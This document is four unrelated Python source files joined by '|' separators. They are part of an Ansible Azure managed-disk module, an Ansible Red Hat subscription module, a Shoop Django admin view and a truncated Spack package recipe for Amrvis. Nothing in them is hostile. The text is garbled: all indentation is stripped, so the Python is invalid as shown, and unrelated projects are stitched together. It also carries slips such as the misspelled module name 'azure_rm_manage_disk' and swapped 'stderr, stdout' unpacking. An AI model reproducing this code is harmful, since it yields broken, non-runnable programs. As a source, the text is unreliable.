- "If I(create_option) is C(copy) then the value must be greater than or equal to the source's size."
managed_by:
description:
- Name of an existing virtual machine with which the disk is or will be associated, this VM should be in the same resource group.
- To detach a disk from a vm, explicitly set to ''.
- If this option is unset, the value will not be changed.
version_added: 2.5
tags:
description:
- Tags to assign to the managed disk.
extends_documentation_fragment:
- azure
- azure_tags
author:
- "Bruno Medina (@brusMX)"
'''
EXAMPLES = '''
- name: Create managed disk
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
- name: Create managed operating system disk from page blob
azure_rm_managed_disk:
name: mymanageddisk
location: eastus2
resource_group: myResourceGroup
create_option: import
source_uri: https://storageaccountname.blob.core.windows.net/containername/blob-name.vhd
os_type: windows
storage_account_type: Premium_LRS
- name: Mount the managed disk to VM
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
managed_by: testvm001
- name: Unmount the managed disk to VM
azure_rm_managed_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
disk_size_gb: 4
- name: Delete managed disk
azure_rm_manage_disk:
name: mymanageddisk
location: eastus
resource_group: myResourceGroup
state: absent
'''
RETURN = '''
id:
description: The managed disk resource ID.
returned: always
type: dict
state:
description: Current state of the managed disk
returned: always
type: dict
changed:
description: Whether or not the resource has changed
returned: always
type: bool
'''
import re
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.tools import parse_resource_id
from msrestazure.azure_exceptions import CloudError
except ImportError:
# This is handled in azure_rm_common
pass
def managed_disk_to_dict(managed_disk):
create_data = managed_disk.creation_data
return dict(
id=managed_disk.id,
name=managed_disk.name,
location=managed_disk.location,
tags=managed_disk.tags,
create_option=create_data.create_option.lower(),
source_uri=create_data.source_uri or create_data.source_resource_id,
disk_size_gb=managed_disk.disk_size_gb,
os_type=managed_disk.os_type.lower() if managed_disk.os_type else None,
storage_account_type=managed_disk.sku.name if managed_disk.sku else None,
managed_by=managed_disk.managed_by
)
class AzureRMManagedDisk(AzureRMModuleBase):
"""Configuration class for an Azure RM Managed Disk resource"""
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
),
location=dict(
type='str'
),
storage_account_type=dict(
type='str',
choices=['Standard_LRS', 'Premium_LRS']
),
create_option=dict(
type='str',
choices=['empty', 'import', 'copy']
),
source_uri=dict(
type='str',
aliases=['source_resource_uri']
),
os_type=dict(
type='str',
choices=['linux', 'windows']
),
disk_size_gb=dict(
type='int'
),
managed_by=dict(
type='str'
)
)
required_if = [
('create_option', 'import', ['source_uri']),
('create_option', 'copy', ['source_uri']),
('create_option', 'empty', ['disk_size_gb'])
]
self.results = dict(
changed=False,
state=dict())
self.resource_group = None
self.name = None
self.location = None
self.storage_account_type = None
self.create_option = None
self.source_uri = None
self.os_type = None
self.disk_size_gb = None
self.tags = None
self.managed_by = None
super(AzureRMManagedDisk, self).__init__(
derived_arg_spec=self.module_arg_spec,
required_if=required_if,
supports_check_mode=True,
supports_tags=True)
def exec_module(self, **kwargs):
"""Main module execution method"""
for key in list(self.module_arg_spec.keys()) + ['tags']:
setattr(self, key, kwargs[key])
result = None
changed = False
resource_group = self.get_resource_group(self.resource_group)
if not self.location:
self.location = resource_group.location
disk_instance = self.get_managed_disk()
result = disk_instance
# need create or update
if self.state == 'present':
parameter = self.generate_managed_disk_property()
if not disk_instance or self.is_different(disk_instance, parameter):
changed = True
if not self.check_mode:
result = self.create_or_update_managed_disk(parameter)
else:
result = True
# unmount from the old virtual machine and mount to the new virtual machine
if self.managed_by or self.managed_by == '':
vm_name = parse_resource_id(disk_instance.get('managed_by', '')).get('name') if disk_instance else None
vm_name = vm_name or ''
if self.managed_by != vm_name:
changed = True
if not self.check_mode:
if vm_name:
self.detach(vm_name, result)
if self.managed_by:
self.attach(self.managed_by, result)
result = self.get_managed_disk()
if self.state == 'absent' and disk_instance:
changed = True
if not self.check_mode:
self.delete_managed_disk()
result = True
self.results['changed'] = changed
self.results['state'] = result
return self.results
def attach(self, vm_name, disk):
vm = self._get_vm(vm_name)
# find the lun
luns = ([d.lun for d in vm.storage_profile.data_disks]
if vm.storage_profile.data_disks else [])
lun = max(luns) + 1 if luns else 0
# prepare the data disk
params = self.compute_models.ManagedDiskParameters(id=disk.get('id'), storage_account_type=disk.get('storage_account_type'))
data_disk = self.compute_models.DataDisk(lun=lun, create_option=self.compute_models.DiskCreateOptionTypes.attach, managed_disk=params)
vm.storage_profile.data_disks.append(data_disk)
self._update_vm(vm_name, vm)
def detach(self, vm_name, disk):
vm = self._get_vm(vm_name)
leftovers = [d for d in vm.storage_profile.data_disks if d.name.lower() != disk.get('name').lower()]
if len(vm.storage_profile.data_disks) == len(leftovers):
self.fail("No disk with the name '{0}' was found".format(disk.get('name')))
vm.storage_profile.data_disks = leftovers
self._update_vm(vm_name, vm)
def _update_vm(self, name, params):
try:
poller = self.compute_client.virtual_machines.create_or_update(self.resource_group, name, params)
self.get_poller_result(poller)
except Exception as exc:
self.fail("Error updating virtual machine {0} - {1}".format(name, str(exc)))
def _get_vm(self, name):
try:
return self.compute_client.virtual_machines.get(self.resource_group, name, expand='instanceview')
except Exception as exc:
self.fail("Error getting virtual machine {0} - {1}".format(name, str(exc)))
def generate_managed_disk_property(self):
# TODO: Add support for EncryptionSettings, DiskIOPSReadWrite, DiskMBpsReadWrite, Zones
disk_params = {}
creation_data = {}
disk_params['location'] = self.location
disk_params['tags'] = self.tags
if self.storage_account_type:
storage_account_type = self.compute_models.DiskSku(name=self.storage_account_type)
disk_params['sku'] = storage_account_type
disk_params['disk_size_gb'] = self.disk_size_gb
creation_data['create_option'] = self.compute_models.DiskCreateOption.empty
if self.create_option == 'import':
creation_data['create_option'] = self.compute_models.DiskCreateOption.import_enum
creation_data['source_uri'] = self.source_uri
elif self.create_option == 'copy':
creation_data['create_option'] = self.compute_models.DiskCreateOption.copy
creation_data['source_resource_id'] = self.source_uri
if self.os_type:
typecon = {
'linux': self.compute_models.OperatingSystemTypes.linux,
'windows': self.compute_models.OperatingSystemTypes.windows
}
disk_params['os_type'] = typecon[self.os_type]
else:
disk_params['os_type'] = None
disk_params['creation_data'] = creation_data
return disk_params
def create_or_update_managed_disk(self, parameter):
try:
poller = self.compute_client.disks.create_or_update(
self.resource_group,
self.name,
parameter)
aux = self.get_poller_result(poller)
return managed_disk_to_dict(aux)
except CloudError as e:
self.fail("Error creating the managed disk: {0}".format(str(e)))
# This method accounts for the difference in structure between the
# Azure retrieved disk and the parameters for the new disk to be created.
def is_different(self, found_disk, new_disk):
resp = False
if new_disk.get('disk_size_gb'):
if not found_disk['disk_size_gb'] == new_disk['disk_size_gb']:
resp = True
if new_disk.get('os_type'):
if not found_disk['os_type'] == new_disk['os_type']:
resp = True
if new_disk.get('sku'):
if not found_disk['storage_account_type'] == new_disk['sku'].name:
resp = True
# Check how to implement tags
if new_disk.get('tags') is not None:
if not found_disk['tags'] == new_disk['tags']:
resp = True
return resp
def delete_managed_disk(self):
try:
poller = self.compute_client.disks.delete(
self.resource_group,
self.name)
return self.get_poller_result(poller)
except CloudError as e:
self.fail("Error deleting the managed disk: {0}".format(str(e)))
def get_managed_disk(self):
try:
resp = self.compute_client.disks.get(
self.resource_group,
self.name)
return managed_disk_to_dict(resp)
except CloudError as e:
self.log('Did not find managed disk')
def main():
"""Main execution"""
AzureRMManagedDisk()
if __name__ == '__main__':
main()
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: redhat_subscription
short_description: Manage registration and subscriptions to RHSM using the C(subscription-manager) command
description:
- Manage registration and subscription to the Red Hat Subscription Management entitlement platform using the C(subscription-manager) command
version_added: "1.2"
author: "Barnaby Court (@barnabycourt)"
notes:
- In order to register a system, subscription-manager requires either a username and password, or an activationkey and an Organization ID.
- Since 2.5 values for I(server_hostname), I(server_insecure), I(rhsm_baseurl),
I(server_proxy_hostname), I(server_proxy_port), I(server_proxy_user) and
I(server_proxy_password) are no longer taken from the C(/etc/rhsm/rhsm.conf)
config file and default to None.
requirements:
- subscription-manager
options:
state:
description:
- whether to register and subscribe (C(present)), or unregister (C(absent)) a system
choices: [ "present", "absent" ]
default: "present"
username:
description:
- access.redhat.com or Sat6 username
password:
description:
- access.redhat.com or Sat6 password
server_hostname:
description:
- Specify an alternative Red Hat Subscription Management or Sat6 server
server_insecure:
description:
- Enable or disable https server certificate verification when connecting to C(server_hostname)
rhsm_baseurl:
description:
- Specify CDN baseurl
server_proxy_hostname:
description:
- Specify a HTTP proxy hostname
version_added: "2.4"
server_proxy_port:
description:
- Specify a HTTP proxy port
version_added: "2.4"
server_proxy_user:
description:
- Specify a user for HTTP proxy with basic authentication
version_added: "2.4"
server_proxy_password:
description:
- Specify a password for HTTP proxy with basic authentication
version_added: "2.4"
auto_attach:
description:
- Upon successful registration, auto-consume available subscriptions
- Added in favor of depracated autosubscribe in 2.5.
type: bool
default: 'no'
version_added: "2.5"
aliases: [autosubscribe]
activationkey:
description:
- supply an activation key for use with registration
org_id:
description:
- Organization ID to use in conjunction with activationkey
version_added: "2.0"
environment:
description:
- Register with a specific environment in the destination org. Used with Red Hat Satellite 6.x or Katello
version_added: "2.2"
pool:
description:
- |
Specify a subscription pool name to consume. Regular expressions accepted. Use I(pool_ids) instead if
possible, as it is much faster. Mutually exclusive with I(pool_ids).
default: '^$'
pool_ids:
description:
- |
Specify subscription pool IDs to consume. Prefer over I(pool) when possible as it is much faster.
A pool ID may be specified as a C(string) - just the pool ID (ex. C(0123456789abcdef0123456789abcdef)),
or as a C(dict) with the pool ID as the key, and a quantity as the value (ex.
C(0123456789abcdef0123456789abcdef: 2). If the quantity is provided, it is used to consume multiple
entitlements from a pool (the pool must support this). Mutually exclusive with I(pool).
default: []
version_added: "2.4"
consumer_type:
description:
- The type of unit to register, defaults to system
version_added: "2.1"
consumer_name:
description:
- Name of the system to register, defaults to the hostname
version_added: "2.1"
consumer_id:
description:
- |
References an existing consumer ID to resume using a previous registration
for this system. If the system's identity certificate is lost or corrupted,
this option allows it to resume using its previous identity and subscriptions.
The default is to not specify a consumer ID so a new ID is created.
version_added: "2.1"
force_register:
description:
- Register the system even if it is already registered
type: bool
default: 'no'
version_added: "2.2"
'''
EXAMPLES = '''
- name: Register as user (joe_user) with password (somepass) and auto-subscribe to available content.
redhat_subscription:
state: present
username: joe_user
password: somepass
auto_attach: true
- name: Same as above but subscribe to a specific pool by ID.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids: 0123456789abcdef0123456789abcdef
- name: Register and subscribe to multiple pools.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids:
- 0123456789abcdef0123456789abcdef
- 1123456789abcdef0123456789abcdef
- name: Same as above but consume multiple entitlements.
redhat_subscription:
state: present
username: joe_user
password: somepass
pool_ids:
- 0123456789abcdef0123456789abcdef: 2
- 1123456789abcdef0123456789abcdef: 4
- name: Register and pull existing system data.
redhat_subscription:
state: present
username: joe_user
password: somepass
consumer_id: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
- name: Register with activationkey and consume subscriptions matching Red Hat Enterprise Server or Red Hat Virtualization
redhat_subscription:
state: present
activationkey: 1-222333444
org_id: 222333444
pool: '^(Red Hat Enterprise Server|Red Hat Virtualization)$'
- name: Update the consumed subscriptions from the previous example (remove Red Hat Virtualization subscription)
redhat_subscription:
state: present
activationkey: 1-222333444
org_id: 222333444
pool: '^Red Hat Enterprise Server$'
- name: Register as user credentials into given environment (against Red Hat Satellite 6.x), and auto-subscribe.
redhat_subscription:
state: present
username: joe_user
password: somepass
environment: Library
auto_attach: true
'''
RETURN = '''
subscribed_pool_ids:
description: List of pool IDs to which system is now subscribed
returned: success
type: complex
contains: {
"8a85f9815ab905d3015ab928c7005de4": "1"
}
'''
import os
import re
import shutil
import tempfile
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.six.moves import configparser
SUBMAN_CMD = None
class RegistrationBase(object):
def __init__(self, module, username=None, password=None):
self.module = module
self.username = username
self.password = password
def configure(self):
raise NotImplementedError("Must be implemented by a sub-class")
def enable(self):
# Remove any existing redhat.repo
redhat_repo = '/etc/yum.repos.d/redhat.repo'
if os.path.isfile(redhat_repo):
os.unlink(redhat_repo)
def register(self):
raise NotImplementedError("Must be implemented by a sub-class")
def unregister(self):
raise NotImplementedError("Must be implemented by a sub-class")
def unsubscribe(self):
raise NotImplementedError("Must be implemented by a sub-class")
def update_plugin_conf(self, plugin, enabled=True):
plugin_conf = '/etc/yum/pluginconf.d/%s.conf' % plugin
if os.path.isfile(plugin_conf):
tmpfd, tmpfile = tempfile.mkstemp()
shutil.copy2(plugin_conf, tmpfile)
cfg = configparser.ConfigParser()
cfg.read([tmpfile])
if enabled:
cfg.set('main', 'enabled', 1)
else:
cfg.set('main', 'enabled', 0)
fd = open(tmpfile, 'w+')
cfg.write(fd)
fd.close()
self.module.atomic_move(tmpfile, plugin_conf)
def subscribe(self, **kwargs):
raise NotImplementedError("Must be implemented by a sub-class")
class Rhsm(RegistrationBase):
def __init__(self, module, username=None, password=None):
RegistrationBase.__init__(self, module, username, password)
self.module = module
def enable(self):
'''
Enable the system to receive updates from subscription-manager.
This involves updating affected yum plugins and removing any
conflicting yum repositories.
'''
RegistrationBase.enable(self)
self.update_plugin_conf('rhnplugin', False)
self.update_plugin_conf('subscription-manager', True)
def configure(self, **kwargs):
'''
Configure the system as directed for registration with RHSM
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'config']
# Pass supplied **kwargs as parameters to subscription-manager. Ignore
# non-configuration parameters and replace '_' with '.'. For example,
# 'server_hostname' becomes '--server.hostname'.
for k, v in kwargs.items():
if re.search(r'^(server|rhsm)_', k) and v is not None:
args.append('--%s=%s' % (k.replace('_', '.', 1), v))
self.module.run_command(args, check_rc=True)
@property
def is_registered(self):
'''
Determine whether the current system
Returns:
* Boolean - whether the current system is currently registered to
RHSM.
'''
args = [SUBMAN_CMD, 'identity']
rc, stdout, stderr = self.module.run_command(args, check_rc=False)
if rc == 0:
return True
else:
return False
def register(self, username, password, auto_attach, activationkey, org_id,
consumer_type, consumer_name, consumer_id, force_register, environment,
rhsm_baseurl, server_insecure, server_hostname, server_proxy_hostname,
server_proxy_port, server_proxy_user, server_proxy_password):
'''
Register the current system to the provided RHSM or Sat6 server
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'register']
# Generate command arguments
if force_register:
args.extend(['--force'])
if rhsm_baseurl:
args.extend(['--baseurl', rhsm_baseurl])
if server_insecure:
args.extend(['--insecure'])
if server_hostname:
args.extend(['--serverurl', server_hostname])
if org_id:
args.extend(['--org', org_id])
if activationkey:
args.extend(['--activationkey', activationkey])
else:
if auto_attach:
args.append('--auto-attach')
if username:
args.extend(['--username', username])
if password:
args.extend(['--password', password])
if consumer_type:
args.extend(['--type', consumer_type])
if consumer_name:
args.extend(['--name', consumer_name])
if consumer_id:
args.extend(['--consumerid', consumer_id])
if environment:
args.extend(['--environment', environment])
if server_proxy_hostname and server_proxy_port:
args.extend(['--proxy', server_proxy_hostname + ':' + server_proxy_port])
if server_proxy_user:
args.extend(['--proxyuser', server_proxy_user])
if server_proxy_password:
args.extend(['--proxypassword', server_proxy_password])
rc, stderr, stdout = self.module.run_command(args, check_rc=True)
def unsubscribe(self, serials=None):
'''
Unsubscribe a system from subscribed channels
Args:
serials(list or None): list of serials to unsubscribe. If
serials is none or an empty list, then
all subscribed channels will be removed.
Raises:
* Exception - if error occurs while running command
'''
items = []
if serials is not None and serials:
items = ["--serial=%s" % s for s in serials]
if serials is None:
items = ["--all"]
if items:
args = [SUBMAN_CMD, 'unsubscribe'] + items
rc, stderr, stdout = self.module.run_command(args, check_rc=True)
return serials
def unregister(self):
'''
Unregister a currently registered system
Raises:
* Exception - if error occurs while running command
'''
args = [SUBMAN_CMD, 'unregister']
rc, stderr, stdout = self.module.run_command(args, check_rc=True)
self.update_plugin_conf('rhnplugin', False)
self.update_plugin_conf('subscription-manager', False)
def subscribe(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression. It matches regexp against available pool ids first.
If any pool ids match, subscribe to those pools and return.
If no pool ids match, then match regexp against available pool product
names. Note this can still easily match many many pools. Then subscribe
to those pools.
Since a pool id is a more specific match, we only fallback to matching
against names if we didn't match pool ids.
Raises:
* Exception - if error occurs while running command
'''
# See https://github.com/ansible/ansible/issues/19466
# subscribe to pools whose pool id matches regexp (and only the pool id)
subscribed_pool_ids = self.subscribe_pool(regexp)
# If we found any matches, we are done
# Don't attempt to match pools by product name
if subscribed_pool_ids:
return subscribed_pool_ids
# We didn't match any pool ids.
# Now try subscribing to pools based on product name match
# Note: This can match lots of product names.
subscribed_by_product_pool_ids = self.subscribe_product(regexp)
if subscribed_by_product_pool_ids:
return subscribed_by_product_pool_ids
# no matches
return []
def subscribe_by_pool_ids(self, pool_ids):
for pool_id, quantity in pool_ids.items():
args = [SUBMAN_CMD, 'attach', '--pool', pool_id, '--quantity', quantity]
rc, stderr, stdout = self.module.run_command(args, check_rc=True)
return pool_ids
def subscribe_pool(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression
Raises:
* Exception - if error occurs while running command
'''
# Available pools ready for subscription
available_pools = RhsmPools(self.module)
subscribed_pool_ids = []
for pool in available_pools.filter_pools(regexp):
pool.subscribe()
subscribed_pool_ids.append(pool.get_pool_id())
return subscribed_pool_ids
def subscribe_product(self, regexp):
'''
Subscribe current system to available pools matching the specified
regular expression
Raises:
* Exception - if error occurs while running command
'''
# Available pools ready for subscription
available_pools = RhsmPools(self.module)
subscribed_pool_ids = []
for pool in available_pools.filter_products(regexp):
pool.subscribe()
subscribed_pool_ids.append(pool.get_pool_id())
return subscribed_pool_ids
def update_subscriptions(self, regexp):
changed = False
consumed_pools = RhsmPools(self.module, consumed=True)
pool_ids_to_keep = [p.get_pool_id() for p in consumed_pools.filter_pools(regexp)]
pool_ids_to_keep.extend([p.get_pool_id() for p in consumed_pools.filter_products(regexp)])
serials_to_remove = [p.Serial for p in consumed_pools if p.get_pool_id() not in pool_ids_to_keep]
serials = self.unsubscribe(serials=serials_to_remove)
subscribed_pool_ids = self.subscribe(regexp)
if subscribed_pool_ids or serials:
changed = True
return {'changed': changed, 'subscribed_pool_ids': subscribed_pool_ids,
'unsubscribed_serials': serials}
def update_subscriptions_by_pool_ids(self, pool_ids):
changed = False
consumed_pools = RhsmPools(self.module, consumed=True)
existing_pools = {}
for p in consumed_pools:
existing_pools[p.get_pool_id()] = p.QuantityUsed
serials_to_remove = [p.Serial for p in consumed_pools if pool_ids.get(p.get_pool_id(), 0) != p.QuantityUsed]
serials = self.unsubscribe(serials=serials_to_remove)
missing_pools = {}
for pool_id, quantity in pool_ids.items():
if existing_pools.get(pool_id, 0) != quantity:
missing_pools[pool_id] = quantity
self.subscribe_by_pool_ids(missing_pools)
if missing_pools or serials:
changed = True
return {'changed': changed, 'subscribed_pool_ids': missing_pools.keys(),
'unsubscribed_serials': serials}
class RhsmPool(object):
'''
Convenience class for housing subscription information
'''
def __init__(self, module, **kwargs):
self.module = module
for k, v in kwargs.items():
setattr(self, k, v)
def __str__(self):
return str(self.__getattribute__('_name'))
def get_pool_id(self):
return getattr(self, 'PoolId', getattr(self, 'PoolID'))
def subscribe(self):
args = "subscription-manager subscribe --pool %s" % self.get_pool_id()
rc, stdout, stderr = self.module.run_command(args, check_rc=True)
if rc == 0:
return True
else:
return False
class RhsmPools(object):
"""
This class is used for manipulating pools subscriptions with RHSM
"""
def __init__(self, module, consumed=False):
self.module = module
self.products = self._load_product_list(consumed)
def __iter__(self):
return self.products.__iter__()
def _load_product_list(self, consumed=False):
"""
Loads list of all available or consumed pools for system in data structure
Args:
consumed(bool): if True list consumed pools, else list available pools (default False)
"""
args = "subscription-manager list"
if consumed:
args += " --consumed"
else:
args += " --available"
rc, stdout, stderr = self.module.run_command(args, check_rc=True)
products = []
for line in stdout.split('\n'):
# Remove leading+trailing whitespace
line = line.strip()
# An empty line implies the end of a output group
if len(line) == 0:
continue
# If a colon ':' is found, parse
elif ':' in line:
(key, value) = line.split(':', 1)
key = key.strip().replace(" ", "") # To unify
value = value.strip()
if key in ['ProductName', 'SubscriptionName']:
# Remember the name for later processing
products.append(RhsmPool(self.module, _name=value, key=value))
elif products:
# Associate value with most recently recorded product
products[-1].__setattr__(key, value)
# FIXME - log some warning?
# else:
# warnings.warn("Unhandled subscription key/value: %s/%s" % (key,value))
return products
def filter_pools(self, regexp='^$'):
'''
Return a list of RhsmPools whose pool id matches the provided regular expression
'''
r = re.compile(regexp)
for product in self.products:
if r.search(product.get_pool_id()):
yield product
def filter_products(self, regexp='^$'):
'''
Return a list of RhsmPools whose product name matches the provided regular expression
'''
r = re.compile(regexp)
for product in self.products:
if r.search(product._name):
yield product
def main():
# Load RHSM configuration from file
rhsm = Rhsm(None)
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present',
choices=['present', 'absent']),
username=dict(default=None,
required=False),
password=dict(default=None,
required=False,
no_log=True),
server_hostname=dict(default=None,
required=False),
server_insecure=dict(default=None,
required=False),
rhsm_baseurl=dict(default=None,
required=False),
auto_attach=dict(aliases=['autosubscribe'], default=False, type='bool'),
activationkey=dict(default=None,
required=False,
no_log=True),
org_id=dict(default=None,
required=False),
environment=dict(default=None,
required=False, type='str'),
pool=dict(default='^$',
required=False,
type='str'),
pool_ids=dict(default=[],
required=False,
type='list'),
consumer_type=dict(default=None,
required=False),
consumer_name=dict(default=None,
required=False),
consumer_id=dict(default=None,
required=False),
force_register=dict(default=False,
type='bool'),
server_proxy_hostname=dict(default=None,
required=False),
server_proxy_port=dict(default=None,
required=False),
server_proxy_user=dict(default=None,
required=False),
server_proxy_password=dict(default=None,
required=False,
no_log=True),
),
required_together=[['username', 'password'],
['server_proxy_hostname', 'server_proxy_port'],
['server_proxy_user', 'server_proxy_password']],
mutually_exclusive=[['activationkey', 'username'],
['activationkey', 'consumer_id'],
['activationkey', 'environment'],
['activationkey', 'autosubscribe'],
['force', 'consumer_id'],
['pool', 'pool_ids']],
required_if=[['state', 'present', ['username', 'activationkey'], True]],
)
rhsm.module = module
state = module.params['state']
username = module.params['username']
password = module.params['password']
server_hostname = module.params['server_hostname']
server_insecure = module.params['server_insecure']
rhsm_baseurl = module.params['rhsm_baseurl']
auto_attach = module.params['auto_attach']
activationkey = module.params['activationkey']
org_id = module.params['org_id']
if activationkey and not org_id:
module.fail_json(msg='org_id is required when using activationkey')
environment = module.params['environment']
pool = module.params['pool']
pool_ids = {}
for value in module.params['pool_ids']:
if isinstance(value, dict):
if len(value) != 1:
module.fail_json(msg='Unable to parse pool_ids option.')
pool_id, quantity = value.items()[0]
else:
pool_id, quantity = value, 1
pool_ids[pool_id] = str(quantity)
consumer_type = module.params["consumer_type"]
consumer_name = module.params["consumer_name"]
consumer_id = module.params["consumer_id"]
force_register = module.params["force_register"]
server_proxy_hostname = module.params['server_proxy_hostname']
server_proxy_port = module.params['server_proxy_port']
server_proxy_user = module.params['server_proxy_user']
server_proxy_password = module.params['server_proxy_password']
global SUBMAN_CMD
SUBMAN_CMD = module.get_bin_path('subscription-manager', True)
# Ensure system is registered
if state == 'present':
# Register system
if rhsm.is_registered and not force_register:
if pool != '^$' or pool_ids:
try:
if pool_ids:
result = rhsm.update_subscriptions_by_pool_ids(pool_ids)
else:
result = rhsm.update_subscriptions(pool)
except Exception as e:
module.fail_json(msg="Failed to update subscriptions for '%s': %s" % (server_hostname, to_native(e)))
else:
module.exit_json(**result)
else:
module.exit_json(changed=False, msg="System already registered.")
else:
try:
rhsm.enable()
rhsm.configure(**module.params)
rhsm.register(username, password, auto_attach, activationkey, org_id,
consumer_type, consumer_name, consumer_id, force_register,
environment, rhsm_baseurl, server_insecure, server_hostname,
server_proxy_hostname, server_proxy_port, server_proxy_user, server_proxy_password)
if pool_ids:
subscribed_pool_ids = rhsm.subscribe_by_pool_ids(pool_ids)
else:
subscribed_pool_ids = rhsm.subscribe(pool)
except Exception as e:
module.fail_json(msg="Failed to register with '%s': %s" % (server_hostname, to_native(e)))
else:
module.exit_json(changed=True,
msg="System successfully registered to '%s'." % server_hostname,
subscribed_pool_ids=subscribed_pool_ids)
# Ensure system is *not* registered
if state == 'absent':
if not rhsm.is_registered:
module.exit_json(changed=False, msg="System already unregistered.")
else:
try:
rhsm.unsubscribe()
rhsm.unregister()
except Exception as e:
module.fail_json(msg="Failed to unregister: %s" % to_native(e))
else:
module.exit_json(changed=True, msg="System successfully unregistered from %s." % server_hostname)
if __name__ == '__main__':
main()
|
from __future__ import unicode_literals
import six
from django.utils.translation import ugettext_lazy as _
from django.views.generic.detail import DetailView
from shoop.core.models import PaymentMethod, ShippingMethod
from shoop.utils.excs import Problem
from shoop.utils.importing import load
class _BaseMethodDetailView(DetailView):
model = None # Overridden below
title = _(u"Edit Details")
def dispatch(self, request, *args, **kwargs):
# This view only dispatches further to the method module's own detail view class
object = self.get_object()
module = object.module
if not module.admin_detail_view_class:
raise Problem("Module %s has no admin detail view" % module.name)
if isinstance(module.admin_detail_view_class, six.text_type):
view_class = load(module.admin_detail_view_class)
else:
view_class = module.admin_detail_view_class
kwargs["object"] = object
return view_class(model=self.model).dispatch(request, *args, **kwargs)
class ShippingMethodEditDetailView(_BaseMethodDetailView):
model = ShippingMethod
class PaymentMethodEditDetailView(_BaseMethodDetailView):
model = PaymentMethod
|
class Amrvis(MakefilePackage):
"""Amrvis is a visualization package specifically designed to
read and display output and profiling data from codes built
on the AMReX framework.
"""
homepage = "https://github.com/AMReX-Codes/Amrvis"
git = "https://github.com/AMReX-Codes/Amrvis.git"
version('main', tag='main')
variant(
'dims',
default='3',
values=('1', '2', '3'),
multi=False,
description='Number of spatial dimensions'
)
variant(
'prec',
default='DOUBLE',
values=('FLOAT', 'DOUBLE'),
multi=False,
description='Floating point precision'
)
variant('mpi', default=True, description='Enable MPI parallel support')
variant('debug', default=False, description='Enable debugging features')
variant('profiling', default=False,
description='Enable AMReX profiling features')
depends_on('gmake', type='build')
depends_on('mpi', when='+mpi')
depends_on('libsm')
depends_on('libice')
depends_on('libxpm')
depends_on('libx11')
depends_on('libxt')
depends_on('libxext')
depends_on('motif')
depends_on('flex')
depends_on('bison')
conflicts(
'+profiling', when='dims=1',
msg='Amrvis profiling support requires a 2D build'
)
conflicts(
'+profiling', when='dims=3',
msg='Amrvis profiling support requires a 2D build'
)
# Only doing gcc and clang at the moment.
# Intel currently fails searching for mpiicc, mpiicpc, etc.
for comp in ['%intel', '%cce', '%nag', '%pgi', '%xl', '%xl_r']:
conflicts(
comp,
msg='Amrvis currently only builds with gcc and clang'
)
# Need to clone AMReX into Amrvis because Amrvis uses AMReX's source
resource(name='amrex',
git='https://github.com/AMReX-Codes/amrex.git',
tag='development',
placement='amrex')
def edit(self, spec, prefix):
# libquadmath is only available x86_64 and powerle
# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=85440
if self.spec.target.family not in ['x86_64', 'ppc64le']:
comps = join_path('amrex', 'Tools', 'GNUMake', 'comps')
maks = [
join_path(comps, 'gnu.mak'),
join_path(comps, 'llvm.mak'),
]
for mak in maks:
filter_file('-lquadmath', '', mak)
# Set all available makefile options to values we want
makefile = FileFilter('GNUmakefile')
makefile.filter(
r'^AMREX_HOME\s*\?=.*',
'AMREX_HOME = {0}'.format('./amrex')
)
makefile.filter(
r'^PRECISION\s*=.*',
'PRECISION = {0}'.format(spec.variants['prec'].value)
)
makefile.filter(
r'^DIM\s*=.*',
'DIM = {0}'.format(spec.variants['dims'].value)
)
makefile.filter(
r'^PROFILE\s*=.*',
'PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^TRACE_PROFILE\s*=.*',
'TRACE_PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^COMM_PROFILE\s*=.*',
'COMM_PROFILE = {0}'.format(
spec.variants['profiling'].value
).upper()
)
makefile.filter(
r'^COMP\s*=.*',
'COMP = {0}'.format(self.compiler.name)
)
makefile.filter(
r'^DEBUG\s*=.*',
'DEBUG = {0}'.format(spec.variants['debug'].value).upper()
)
makefile.filter(
r'^USE_ARRAYVIEW\s*=.*',
'USE_ARRAY_VIEW = FALSE'
)
makefile.filter(
r'^USE_MPI\s*=.*',
'USE_MPI = {0}'.format(spec.variants['mpi'].value).upper()
)
makefile.filter(
r'^USE_CXX11\s*=.*',
'USE_CXX11 = TRUE'
)
makefile.filter(
r'^USE_VOLRENDER\s*=.*',
'USE_VOLRENDER = FALSE'
)
makefile.filter(
r'^USE_PARALLELVOLRENDER\s*=.*',
'USE_PARALLELVOLRENDER = FALSE'
)
makefile.filter(
r'^USE_PROFPARSER\s*=.*',
'USE_PROFPARSER = {0}'.format(
spec.variants['profiling'].value
).upper()
)
# A bit risky here deleting all /usr and /opt X
# library default search paths in makefile
makefile.filter(
r'^.*\b(usr|opt)\b.*$',
'# Spack removed INCLUDE_LOCATIONS and LIBRARY_LOCATIONS'
)
# Read GNUmakefile into array
with open('GNUmakefile', 'r') as file:
contents = file.readlines()
# Edit GNUmakefile includes and libraries to point to Spack
# dependencies.
# The safest bet is to put the LIBRARY_LOCATIONS and
# INCLUDE_LOCATIONS at the beginning of the makefile.
line_offset = 0
count = 0
for lib in ['libsm', 'libice', 'libxpm', 'libx11',
'libxt', 'libxext', 'motif']:
contents.insert(
line_offset + count,
